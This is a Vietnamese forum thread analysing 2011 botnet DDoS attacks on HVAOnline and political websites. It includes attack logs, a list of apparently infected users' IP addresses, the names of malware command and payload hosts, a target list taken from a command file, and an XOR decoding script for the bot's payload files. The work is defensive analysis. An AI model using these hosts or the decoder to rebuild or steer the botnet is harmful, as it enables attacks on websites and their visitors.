217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.98.232.132 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.100.114.170 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/19.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.91.88.200 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/31.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.170.208.138 - - [03/Aug/2011:21:08:11 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.97.237.109 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.170.208.138 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/show/50.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
217.219.67.187 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/posts/list/14876.html#88643 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
175.100.114.170 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/forums/list.html HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
118.97.237.109 - - [03/Aug/2011:21:08:12 +0200] "GET /hvaonline/posts/list/39654.html#244533 HTTP/1.1" 403 861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)
"

6. Dạng sử dụng referer "/tof/" để access trang chủ và forum: Code:

117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefo
x/3.6.6"
117.2.133.220 - - [10/Aug/2011:05:55:49 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefo
x/3.6.6 (.NET CLR 3.5.30729)"
118.71.104.37 - - [10/Aug/2011:06:02:53 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fe
dora/3.6.7-1.fc14 Firefox/3.6.7"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 GTB7.1"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 Cent
OS/3.6-3.el5.centos Firefox/3.6.7"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00"
117.2.133.220 - - [10/Aug/2011:06:04:12 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ub
untu/10.04 (lucid) Firefox/3.6.6"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firef
ox/3.6.6 (.NET CLR 3.5.30729)"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firef
ox/3.6.6 GTB7.1"
222.254.71.201 - - [10/Aug/2011:06:42:14 -0500] "GET / HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00"
58.187.43.64 - - [10/Aug/2011:08:44:25 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fed
ora/3.6.7-1.fc13 Firefox/3.6.7"
222.252.147.137 - - [10/Aug/2011:09:24:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.
62 Version/11.00"
222.252.147.137 - - [10/Aug/2011:09:24:06 -0500] "GET /hvaonline/forums/list.html HTTP/1.1" 403 2108 "/tof/" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 
Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0"
113.22.144.231 - - [10/Aug/2011:10:40:50 -0500] "GET /toforum HTTP/1.1" 403 861 "/" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.107 Safari
/535.1"
113.169.217.196 - - [10/Aug/2011:11:08:52 -0500] "GET /tof/ HTTP/1.1" 403 861 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS35926; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072
9; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"
113.169.217.196 - - [10/Aug/2011:11:08:52 -0500] "GET /tof/ HTTP/1.1" 403 861 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; BTRS35926; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.3072
9; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3)"

Nói chung là chỉ bấy nhiêu thứ. Cứ lòng vòng hết referer này đến User-Agent kia.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Vừa phát hiện một botnet khác sử dụng User-Agent "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)". Sau đây là danh sách 300 IP dữ dằn nhất (chủ yếu là từ VN). Nếu anh chị em nào thấy có IP của mình nằm trong danh sách này, xin vui lòng liên hệ trực tiếp với tôi qua PM. Cám ơn. 113.160.101.152 113.160.110.89 113.160.111.68 113.160.112.43 113.160.148.100 113.160.24.98 113.160.3.158 113.160.62.142 113.161.144.221 113.161.144.222 113.161.161.249 113.162.118.128 113.162.120.225 113.162.120.35 113.162.136.65 113.162.137.26 113.162.201.143 113.162.203.171 113.162.218.73 113.162.221.140 113.162.237.57 113.162.248.116 113.162.248.176 113.162.248.209 113.162.64.100 113.162.64.97 113.162.88.154 113.162.92.184 113.162.92.60 113.162.96.16 113.162.96.202 113.162.96.22 113.162.96.26 113.162.96.44 113.165.11.90 113.165.183.227 113.165.185.149 113.165.210.208 113.165.213.239 113.165.222.43 113.165.223.100 113.165.243.169 113.165.244.36 113.165.244.57 113.165.253.240 113.166.13.192 113.166.134.90 113.166.174.89 113.166.19.140 113.166.212.203 113.166.62.66 113.166.77.219 113.167.102.164 113.167.102.49 113.167.106.144 113.167.109.203 113.167.111.21 113.167.112.209 113.167.117.124 113.167.1.20 113.167.123.181 113.167.123.73 113.167.126.44 113.167.144.170 113.167.153.122 113.167.153.205 113.167.168.19 113.167.168.5 113.167.178.245 113.167.202.192 113.167.207.47 113.167.208.253 113.167.209.21 113.167.209.94 113.167.2.65 113.167.3.191 113.167.39.145 113.167.94.141 113.168.106.93 113.168.110.22 113.168.111.184 113.168.11.154 113.168.113.127 113.168.125.98 113.168.156.238 113.168.183.7 113.168.187.180 113.168.188.65 113.168.189.45 113.168.213.248 113.168.223.169 113.168.223.193 113.168.236.10 113.168.30.104 113.168.5.124 113.168.69.212 113.168.78.218 113.168.81.193 113.168.90.12 113.168.93.111 113.171.100.89 113.171.105.139 113.171.107.41 113.171.108.66 113.171.133.9 113.171.144.115 113.171.152.147 113.171.169.241 113.171.170.46 113.171.194.29 113.171.48.221 113.171.51.30 113.171.55.96 113.171.61.79 113.171.63.254 113.172.153.174 113.172.164.11 113.172.48.198 113.178.15.8 113.178.27.56 113.179.226.57 113.179.70.3 113.179.7.178 113.179.88.201 113.185.2.158 113.185.2.164 113.185.2.172 113.190.0.204 113.190.133.37 113.190.160.27 113.190.161.137 113.190.16.114 113.190.162.127 113.190.169.15 113.190.181.3 113.190.19.33 113.190.196.218 113.190.238.11 113.190.32.86 113.190.35.165 113.190.4.25 113.190.53.176 113.190.63.215 113.190.72.251 113.190.81.18 113.190.81.42 113.190.82.143 113.190.83.169 113.190.83.196 113.190.84.4 113.190.87.58 113.190.88.183 113.190.92.37 113.190.95.27 113.22.118.5 113.22.2.133 113.22.24.212 113.22.50.216 113.22.61.106 113.22.80.244 115.72.230.84 115.73.230.165 115.73.36.67 115.74.125.27 115.78.12.116 115.78.232.189 116.118.63.28 117.0.173.228 117.0.20.186 117.2.60.13 117.2.60.15 117.4.156.191 117.4.156.227 117.4.157.229 117.4.46.198 117.4.59.90 117.4.94.87 117.6.135.123 117.6.2.245 118.46.118.141 118.68.199.51 118.68.221.147 118.68.43.5 118.68.44.69 118.69.224.56 118.69.35.89 118.69.74.4 118.70.127.31 118.70.131.212 118.71.109.141 118.71.147.27 118.71.190.145 118.71.23.52 118.71.29.134 118.71.51.231 118.71.58.34 119.194.59.186 121.132.61.222 123.16.104.109 123.16.107.131 123.16.118.44 123.16.119.204 123.16.119.222 123.16.12.227 123.16.161.157 123.16.163.186 123.16.167.160 123.16.173.104 123.16.202.192 123.16.204.12 123.16.208.16 123.16.220.39 123.16.221.66 123.16.222.150 123.16.223.194 123.16.25.196 123.16.72.11 123.16.74.131 123.16.76.131 123.16.96.125 123.17.139.76 123.17.145.91 123.17.152.29 123.17.153.62 123.17.157.44 123.17.158.58 123.17.159.33 123.17.188.180 123.17.192.203 123.17.229.208 123.17.255.238 123.18.112.145 123.18.123.152 123.18.134.33 123.18.146.128 123.18.146.77 123.18.150.246 123.18.178.213 123.18.188.154 123.18.221.129 123.18.244.132 123.18.77.19 123.18.79.158 123.18.82.16 123.19.173.118 123.19.21.117 123.19.251.146 123.19.255.141 123.19.27.218 123.19.46.44 123.20.164.93 123.20.197.131 123.20.228.191 123.20.232.191 123.20.39.120 123.20.54.148 123.21.139.77 123.21.253.65 123.22.166.41 123.23.32.237 123.24.108.235 123.24.110.140 123.24.112.193 123.24.131.81 123.24.140.129 123.24.19.212 123.24.194.103 123.24.202.22 123.24.208.85 123.24.216.224 123.24.219.41 123.24.233.147 123.24.233.167 123.24.235.62 123.24.240.27 123.24.31.84 123.24.33.207 123.24.35.215 123.24.50.183 123.24.5.233 123.24.63.147 123.24.63.228 123.24.8.162 123.24.9.69 123.25.238.45 123.26.140.28 123.26.147.184 123.26.193.95 123.26.253.11 123.26.30.194 123.26.45.234 123.26.53.224 123.26.54.142 123.26.70.130 123.26.70.169 123.26.71.234 123.26.94.131 123.27.112.92 123.27.12.87 123.27.144.40 123.27.153.165 123.27.158.162 123.27.182.142 123.27.190.31 123.27.211.24 123.27.221.92 123.27.226.190 123.27.28.138 123.27.32.33 123.27.75.235 123.27.77.254 123.27.80.5 123.30.9.250 14.160.52.134 1.53.61.68 1.55.132.7 1.55.18.55 1.55.221.175 1.55.223.131 1.55.9.53 175.215.110.55 180.10.34.227 183.182.127.28 183.81.56.218 183.81.75.61 183.91.12.221 183.91.2.142 183.91.4.249 183.91.4.72 183.91.7.64 202.151.164.52 203.162.168.103 203.210.152.170 203.210.155.214 203.210.204.52 221.185.92.211 222.252.101.156 222.252.103.132 222.252.106.152 222.252.107.118 222.252.108.39 222.252.113.177 222.252.113.40 222.252.115.72 222.252.118.246 222.252.137.50 222.252.147.184 222.252.171.124 222.252.196.215 222.252.198.194 222.252.198.32 222.252.213.195 222.252.215.205 222.252.215.62 222.252.217.88 222.252.223.2 222.252.24.121 222.253.77.101 222.254.103.6 222.254.104.232 222.254.11.179 222.254.12.105 222.254.126.34 222.254.140.91 222.254.141.186 222.254.18.243 222.254.25.224 222.254.4.63 222.254.4.69 222.254.58.23 222.254.61.193 222.254.64.179 222.254.72.102 222.254.73.232 222.254.76.76 222.254.82.226 222.254.8.38 222.255.6.83 27.2.102.103 27.74.131.21 27.74.66.222 42.118.232.59 42.119.231.218 58.186.16.128 58.187.111.253 58.187.56.20 58.187.96.164 66.110.121.148 71.21.15.74

Phân tích tính chất vài trận DDoS HVA vừa qua.

ivanst — GMT

Làm * mà biết đc IP đó là của mình khi đang xài IP động hả anh COM . Lúc sáng + trưa nay site bị ddos hả anh em bấm vào forum chờ dài cổ ko vào đc .

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

@ivanst : nếu modem của bạn không bị reset thì ip vẫn giữ nguyên tính đến thời điểm anh conmale post danh sách ip trên. bạn có thể vào trang web http://whatismyipaddress.com/ để biết ip của mình

Phân tích tính chất vài trận DDoS HVA vừa qua.

xnohat — GMT

softforpc wrote:

Anh PXMMRF, cho em hỏi cái phần mềm anh dùng ở hình 6a để theo dõi connections có tên là gì vậy?

ở hình 6a thì đó không phải là Wireshark. Tôi không rõ chính xác ứng dụng mà bác PXMMRF dùng, nhưng có thứ tương đương là TCPView của sysinternals ( đã bị Microsoft mua lại ), kết hợp thêm Process explorer cũng của sysinternals thì bồ sẽ có 1 bộ toolbox khá tốt để nhanh chóng nhận định sự tồn tại của một process lạ đang cố tạo các kết nối mạng đáng ngờ

Phân tích tính chất vài trận DDoS HVA vừa qua.

stylish_man — GMT

Chà lơ ngơ thế nào máy mình lại nhiễm mớ sandboxies, đang SYN request mấy trang blog rầm rầm thế này Huhu bắt đền anh TQN

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

stylish_man wrote:

Chà lơ ngơ thế nào máy mình lại nhiễm mớ sandboxies, đang SYN request mấy trang blog rầm rầm thế này Huhu bắt đền anh TQN

Mèn, sao lại đòi TQN đền là sao? Chính bồ "lơ ngơ" mà lại đòi bắt đền người khác. Thôi thì cứ theo những hướng dẫn trong chủ đề này mà diệt mớ malware đó. Cách dễ nhất là download Avira và dùng nó để remove mớ malware này.

Phân tích tính chất vài trận DDoS HVA vừa qua.

cino — GMT

crc32 wrote:

- Em cũng đang sài Hệ Điều Hành 6k đó anh, anh có thể chỉ em làm cách nào để phát hiện chú "quản trị cấp hệ thống"

{spam} Hì. Vừa đây mình có cài để test bản Windows server 2008 32bit lên virtualbox, đĩa hàng chợ của một ông bạn làm cùng. Nó tự xuất hiện trong "User Panel" luôn nên không cần "cheat" gì phức tạp. Username là "fengge" nâng quyền từ Standard lên Administrator. Mình thử cài KAV 6.0 (bản server) quyét thì có ra 1 mớ trojan và đã diệt được, nhưng 1 thời gian sau "fengge" lại xuất hiện (sau khi bị mình xoá). Không biết có phải trên môi trường virtualization thì KAV chạy không tốt hay không. Cuối cùng, theo bản năng, mình đập luôn cái VM đó để sau này khỏi lăn tăn...

crc32 wrote:

....để em góp phần tiêu diệt đám stl?

À, ý là mình là do tiện thể nói đến những nguồn malware khả dĩ ở VN thôi, chứ chắc đám "STL" gì gì đó không liên quan tới nguồn này. Hihi {/spam}

Phân tích tính chất vài trận DDoS HVA vừa qua.

whitesnow19 — GMT

Các anh xem thử domain sau có gì không nhé. Thằng AvastSvc.exe của em máy ngày nay toàn kết nối với nó thôi. Mỗi lần có gần chục kết nối. causig1.cau.edu Chương trình antiVirus mà kết nối tới .edu????

Phân tích tính chất vài trận DDoS HVA vừa qua.

insanity — GMT

không biết tại sao sáng nay lúc gần 10h sáng em không thể truy cập vào vietnamnet và hva , chú conmale hiện nay hva còn bị DDOS không chú

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Sau mấy ngày đi miền Tây về, sáng nay kiểm tra các file ra lệnh DDOS của stl, thấy có một số điều cần post sau: 1. File backgrounds.jpg http://net.iadze.com/backgrounds.jpg: Code:

http://danlambaovn.blogspot.com
 http://www.aihuuphuyen.org
 http://nguoiduatinkami.wordpress.com
 http://vrvradio.com
 http://danlambaovn.disqus.com
 http://aotrangoi.com
 http://viettan.org
 http://dangviettan.wordpress.com
 http://radiochantroimoi.com
 http://radiochantroimoi.wordpress.com
 http://bandoclambao.wordpress.com

Backgrounds.jpg đã bổ sung thêm một số website "lề trái" khác để DDOS. 2. Server: second.dinest.net không respond = "WTF" nữa, lần này lại tiếp tục trả về hai file xv.jpg và xc.jpg: xv.jpg: 2011-08-15 04:47:58 xc.jpg Code:

HVA ta vẫn tiếp tục bị DDOS. Thòng thêm x-cafevn.org, tienve.org, viettan.org. Theo ý của tôi thì lần này ngoài mục đích chính là HVA, con AcrobatUpdater.exe mới còn đánh thêm một loạt các website # đặt chung trên cùng server của HVA. Ý đồ là muốn cho cả server này sụp ???? Phải nói là em quá ngán ngẫm với mấy anh stl này rồi, lạy mấy anh đấy, mấy anh quá lỳ lợm, chai mặt, không biết xấu hổ vừa vừa chứ ! Mấy anh cứ tìm mọi cách che dấu, bưng bít thông tin đối với người dân Viet Nam ta à. Chắc mấy anh muốn chiến tranh nổ ra mà mọi người dân không biết để không kịp đề phòng, để mất nước à ? PS: Xuống miền Tây đi đám, tình cờ ngồi chung bàn với một ông công an tỉnh của một tỉnh miền Tây, ổng nói một câu: Sáng giờ phải chạy lo tiếp cái đám công an Trùng Khánh TQ qua giao lưu kết nghĩa. Em không nói gì, chỉ thán một câu: hết biết ?????????????????????????????

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Hồi sáng đột nhiên "lũ quỷ" lại xuất hiện. Tuy nhiên không có tác hại gì mấy. Ai đó không vô được diễn đàn có lẽ do firewall thuộc nhánh bên Đức bị sự cố. Đã fixed xong sự cố đó. Phải công nhận các bạn STL tiền của, thời gian rất phong phú ;). Ước gì thời gian và tiền bạc đó dùng để giúp cho người nghèo khó, già yếu, bệnh tật thì hay biết mấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Tim em mới hóng được VietNamNet bị DDoS thê thảm, Tuần Việt Nam thì toàn giun với dế

Bro TQN thử check xem bọn STL có làm không nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

hivikoro — GMT

tình hình là em thấy Vietnamnet.vn bị Ddos gần như tê liệt lun , 12h58'

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Chắc chắn stl vẫn còn ít nhất là 1 botnet khác chưa bị phát hiện. Chắc chắn các zombies vẫn còn nhiễm một thứ tương tự như "AcrabatUpdater.exe". Từ cuối 2009 đến nay, các bạn stl đã spam quá nhiều .exe giả .doc và hàng chục (nếu như không phải hàng trăm ngàn) em bị dính chấu. PS: các bạn bên vietnamnet nếu cần góp ý kỹ thuật, xin liên hệ trực tiếp với tôi qua PM.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hiện tại chúng ta vẫn chưa biết được mạng bot net nào khác của stl đang được lệnh DDOS Vietnamnet. Và User-Agent Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com) của HTTP GET request của con bot nằm vùng trên máy nạn nhân cũng chưa xác định được. Năm ngoái, mẫu: GoogleCrashHandler.exe chính là bot nằm vùng của stl để DDOS VietnamNet. Trên máy bạn nào có GoogleCrashHandler.exe vui lòng upload lên giùm để các anh em khác phân tích, kiểm tra. Hoặc bạn cũng có thể dùng Wireshark hay SmartSniff để monitor xem nó connect về đâu lấy thông tin DDOS, đang DDOS bằng HTTP protocol vào website nào ? Dưới đây là đoạn 010Editor script nhỏ để decode file top.jpg và flash.swf mà GoogleCrashHandler tải về để tiếp tục download con bot AcrobatUpdater.exe Code:

//----------------------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeTopJpg.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode file top.jpg downloaded from http://penop.net/top.jpg
// This file can decode fake flash file downloaded from http://poxxf.com/flash.swf too.
//--------------------------------------------------------------------------------------------------
int i, j, size = FileSize();

if (size <= 0)
{
    MessageBox(idOk, "DecodeTopJpg", "No file loaded or file empty.");
    return -1;
}

// Modify from 8th byte
for (i = 8,  j = 0; i < size; i++, j++)
{
    // Modify the current byte
    WriteUByte(i, ReadUByte(i) ^ ReadUByte(4 + j % 4));
}

Cảm ơn các bạn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

aminhan — GMT

Mình dùng Everything kiếm được 1 file & có file khác có tên giống giống vậy

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Cảm ơn aminhan ! File của bạn là file sạch, của Google. Các file sạch ta có thể kiểm tra bằng cách: right click - Properties. Nếu có Tab "Digital Signatures" và trong Signature list là các công ty signer hợp lệ thì file đó 99% là sạch. Các file mạo danh của stl sẽ không có Digital Signature (chữ ký số).

Phân tích tính chất vài trận DDoS HVA vừa qua.

aminhan — GMT

TQN wrote:

Cảm ơn aminhan ! File của bạn là file sạch, của Google. Các file sạch ta có thể kiểm tra bằng cách: right click - Properties. Nếu có Tab "Digital Signatures" và trong Signature list là các công ty signer hợp lệ thì file đó 99% là sạch. Các file mạo danh của stl sẽ không có Digital Signature (chữ ký số).

Thanks TQN. Vì mấy hôm trước thấy máy tính có nhiễm AcrobatUpdater.exe nhưng theo hướng dẫn nên delete nó hết rồi, chỉ sợ hôm nay lại bị.

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

He he, mấy bạn stl chơi trò chém gió "bullshit" khi liệt kê hvaonline.net và tienve.org chung với viettan.org và x-cafevn.org. Cái botnet của mấy bạn gãi chưa ngứa nổi HVA thì bày đặt chêm thêm mấy cái site kia vô làm chi? Phân tán DDoS kiểu như vậy thì chết ai? Các bạn nhứ nhứ cái tên x-cafevn.org và viettan.org là để bu lu ba loa rằng hvaonline.net cũng một giuộc với mấy site kia? :-) . Cái này đúng là "bullshit" vì mới hồi nãy tớ lấy đăng nhập của server x-cafe để coi thử cái log thì thấy mấy bạn "đấm" x-cafe toàn bằng cái mớ "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)" ngút ngàn kia. Cái này chứng tỏ mấy bạn còn ít nhất 1 cái botnet ở đâu đó. Từ từ khoai sẽ nhừ thôi. Thiên hạ bây giờ quá rành cái trò chôm pass của mấy bạn cho nên gặt hái cũng ế ẩm, mấy cái mailbox thu hoạch cũng bị lộ tẩy cho nên càng thê thảm. Bởi vậy các bạn quay qua chơi trò ném đá (đốt) phải không nào? Nói thiệt, đôi khi tớ thầm mong các bạn chỉ là một vài thằng nhãi thừa thời gian, lắm tiền của và thích bảo vệ niềm tin chớ chẳng phải là tà lọt của lực lượng nào. Có vậy thì đỡ ê chề bởi vì nếu một lực lượng nào mà dung dưỡng để các bạn làm toàn là những trò bỉ ổi và ti tiện thì không có cách nào tổ chức đó tốt đẹp được. Những người như mấy bạn có lẽ chẳng biết quái gì là lý lẽ, sự thật và đạo đức. Chính vì vậy, cho dù có tàn phá thiên hạ, các bạn không bao giờ lên tới đỉnh điểm của sự phá hoại cùng cực bởi vì tri thức và trí thức của các bạn chỉ tới mức đó là hết. Cứ loay hoay mãi với mấy cái trò compression, socks, encrypt, xor... và cũng chỉ có bấy nhiêu thứ trong file xml. Các bạn không biết rằng tận cùng của bất cứ encryption nào đi chăng nữa cũng sẽ là cleartext ở điểm nào đó. Tận cùng của client / server (để đốt) thì cũng có những client sẽ lộ và client mà lộ thì server cũng đi tong. Các bạn quá bế tắc và quá trễ rồi. Đi từ chỗ một lực lượng "bí ẩn" với cái "lệnh bài" bí hiểm thì nay trước dư luận, các bạn chỉ là một đám đầu trộm đuôi cướp, lừa đảo, lường gạt và phá hoại trên mạng ảo. Từ lúc các bạn tấn công HVA đến nay, các bạn đã bị tổn thất những gì? Hãy tự mà kiểm lại. Tự nhìn lại mình và những hành động đã làm nếu các bạn còn một chút lương tri và đạo đức. PS: tớ phải nói thật là tớ rất buồn khi khám phá ra một số chi tiết dính líu đến một số thành viên HVA (hoặc đã từng là thành viên của HVA) cũng thuộc đám phá hoại này nhưng không sao, một cái cây còn có cành cao, cành thấp, lá xanh, lá sâu mà huống hồ chi mạng ảo tạp nham?

Phân tích tính chất vài trận DDoS HVA vừa qua.

Nowhereman — GMT

a) thực ra những người đang âm thầm tiến hành DDOS HVA và một số site mà họ tưởng là " lề trái","phản động"; là những người rất đáng thương hại vì những lý do sau - > họ không đủ kiến thức và hiểu biết tối thiểu để nhận thức được giá trị tự do của mỗi cá nhân con người trong đó cụ thể là họ. điều này cũng dễ hiểu vì cả đời từ khi sinh ra cho đên lúc lớn lên; từ đời ông tổ của họ đều chỉ biết đến miếng cơm manh áo, dạ vâng, tuân lệnh " cấp trên"; ngoài xã hội thì họ ngó trước ngó sau, tranh dành bon chen vì cuộc sống họ sẵn sàng phỉ nhỏ xỉ vả, đánh đập người khác để có được cái khố vá víu mảnh đời nô lệ tăm tối của họ=> họ làm sao hiểu được dân chủ tự do? khi mà tư tưởng đáng thương hại của họ chỉ biết tuân lệnh và kiếm vài triệu đồng một tháng nuôi thân ! -> họ khô đủ kiến thức để nghĩ ra một trò gì mới mẻ hơn là đi bắt trước lại những đòn cũ mèm ( viết vài dòng malware dụ, lừa , giả danh nhà nước bắt bớ con dân cài cắm đủ các loại malware tạp nham , rồi vung vài đồng tài chợ bố thí mua severs nước ngoài cài cắm ba cái mớ trẻ con cũng làm được để ra lệnh này nọ ddos người này cắt shit người khác ...:)) . cứ tưởng thế là hay? là cao ??? thử hỏi bất kể đứa trẻ danh nào nghịc IT cũng làm được ? vậy mà tự ảo tưởng ta đây là HAY ? òy . ?? thử xem ngoài những người ngoại đạo bị lừa và bị ép buộc cài cắm 3 cái malware rác bẩn ra ? xem có ai biết IT bị dính kô? !!! đáng thương quá ! có khi lúc lộ diện ra lại toàn bằng cấp này nọ đào tạo Chính Quy nhà nước mới nhục he he he <<< =))) tôi chắc một điều tôi chẳng được đào tạo ở đâu nhưng chắc chắn cũng hơn hết thẩy mấy thằng DDOs bẩn này về mặt Code và sự sáng tạo. thậm chí về mặt học thuật và học vấn. xin lỗi những bạn đọc khác vì tôi fai' no ra những sự thật trên. kô nói ra đám rác rưởi lại cứ tưởng hay lại đi bậy bạ doạ những người ngoại IT khác. => chúng ta nên thưong hại bọn này .

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Theo mình nghĩ không nên mang chuyện triết lý và đạo đức để phê phán nhóm STL , vì dẫu sao họ cũng làm việc theo lý tưởng, theo mục đích sống của họ dẫu có thể đó là mù quáng. ở 1 góc độ nào đó thì cũng phải cảm ơn họ vì họ mà những người nhiệt huyết và có tâm như TQN cũng như BQT HVA đã mở mang kiến thức cho mọi người từ trình độ it basic đến advance hiểu thêm về virus và các biện pháp bảo vệ, vốn dĩ những kỹ thuật RC chỉ lưu hành nội bộ. Chỉ thực sự khi nào họ ngã ngựa trên con đường họ đang đi và bởi chính đức tin họ đang theo đuổi làm họ ngã thì có thể họ cảm nhận được và hiểu ra vấn đề. PS mình rất thích anh TQN châm chọc STL bằng kỹ thuật và những phân tích.

Phân tích tính chất vài trận DDoS HVA vừa qua.

myquartz — GMT

Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ. A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...

